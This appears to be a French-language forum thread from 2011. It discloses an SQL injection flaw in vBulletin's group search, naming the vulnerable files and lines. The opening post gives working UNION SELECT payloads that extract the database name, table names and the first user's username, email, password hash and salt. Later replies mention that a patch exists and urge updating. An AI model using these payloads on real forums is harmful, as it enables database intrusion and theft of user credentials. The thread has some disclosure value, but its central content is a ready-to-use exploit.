Invité lakamora Posté(e) le 24 mai 2011 Share Posté(e) le 24 mai 2011 -------------------------- # ~Vulnerable Codes~ # -------------------------- /vb/search/searchtools.php - line 715; /packages/vbforum/search/type/socialgroup.php - line 201:203; -------------------------- # ~Exploit~ # -------------------------- POST data on "Search Multiple Content Types" => "groups" &cat[0]=1) UNION SELECT database()# &cat[0]=1) UNION SELECT table_name FROM information_schema.tables# &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1# plus d'info sur : http://j0hnx3r.org/?p=818 il devient bien pourri le vbulletin :confused: Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité lakamora Posté(e) le 24 mai 2011 Share Posté(e) le 24 mai 2011 reparé cette faille au plus vite Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
alirobben Posté(e) le 24 mai 2011 Share Posté(e) le 24 mai 2011 C'est déja corrigé, faut juste toujours MAJ, ca sert a ca aussi. Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité lakamora Posté(e) le 24 mai 2011 Share Posté(e) le 24 mai 2011 oué j'ai vue dans communauté il ya pas group ^^ Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
sad723 Posté(e) le 24 mai 2011 Share Posté(e) le 24 mai 2011 merci pour l'info; le bon emplacement c'est : Sécurité Informatique http://www.forumdz.com/forumdisplay.php?32-S%E9curit%E9-Informatique ; Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Messages recommandés
Rejoindre la conversation
Vous pouvez publier maintenant et vous inscrire plus tard. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.